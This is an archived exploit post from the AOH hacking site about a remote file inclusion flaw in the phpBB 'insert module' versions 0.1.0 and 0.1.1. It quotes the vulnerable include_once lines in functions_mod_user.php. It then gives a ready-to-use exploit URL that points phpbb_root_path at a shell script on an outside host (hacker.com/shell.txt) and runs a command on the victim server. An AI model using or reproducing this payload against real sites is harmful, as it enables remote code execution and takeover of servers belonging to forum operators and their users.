AOH :: Web BBS :: Frequently Exploited

AOH :: Web BBS :: Frequently Exploited :: B06-5192.HTM
Phpbb insert mod Remote file include

Phpbb insert mod Remote file include Phpbb insert mod Remote file include


$ BiyoSecurity.Org & SecurityWall.Org

$ Script Name : Phpbb insert module

$ versions : 0.1.0 and 0.1.1

$ Risk : High

$ Regard : KorsaN

$ Thanks : Liz0zim , RMx , TR_IP , DreamLord , Kubra

$ Vulnerable File : functions_mod_user.php

$ Vulnerable code : 

<-- code start -->


include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);
include_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);
include_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);
 

$ Exploit : 

www.victim.com/[path]/functions_mod_user.php?phpbb_root_path=http://hacker.com/shell.txt?&cmd=ls

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.